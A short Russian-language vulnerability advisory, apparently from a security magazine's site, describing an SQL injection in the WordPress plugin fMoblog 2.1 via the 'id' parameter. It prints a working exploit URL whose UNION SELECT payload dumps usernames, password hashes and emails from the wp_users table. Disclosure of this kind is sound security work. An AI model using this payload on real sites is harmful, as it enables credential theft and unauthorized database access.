SQL-инъекция в WordPress Plugin fMoblog

Рекомендуем почитать:

Xakep #304. IP-камеры на пентестах

Содержание выпуска
Подписка на «Хакер»-60%

Программа: WordPress Plugin fMoblog 2.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id». Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

Демонстрация:

Классика — 2

SQL-инъекция в WordPress Plugin fMoblog

Xakep #304. IP-камеры на пентестах

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Карта мира генеративного ИИ. Выбираем модель и интерфейс, разбираемся с терминами

Базовые атаки на AD. Разбираем Kerberoasting, AS-REP Roasting и LLMNR Poisoning

HTB Blurry. Атакуем сервер через уязвимость в ClearML

Отчет с OFFZONE 2024. Как я слушал доклады, дегустировал пиво и чудом не потерялся

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

В Citizen Lab нашли проблемы в протоколе MMTLS, используемом в WeChat

Иранские хакеры торгуют доступами к взломанным сетям

0-day в Internet Explorer применяли для распространения малвари RokRAT

Северокорейские хакеры устраиваются в американские компании и вымогают деньги у работодателей

«Рога и копыта» маскируют малварь под запросы от потенциальных клиентов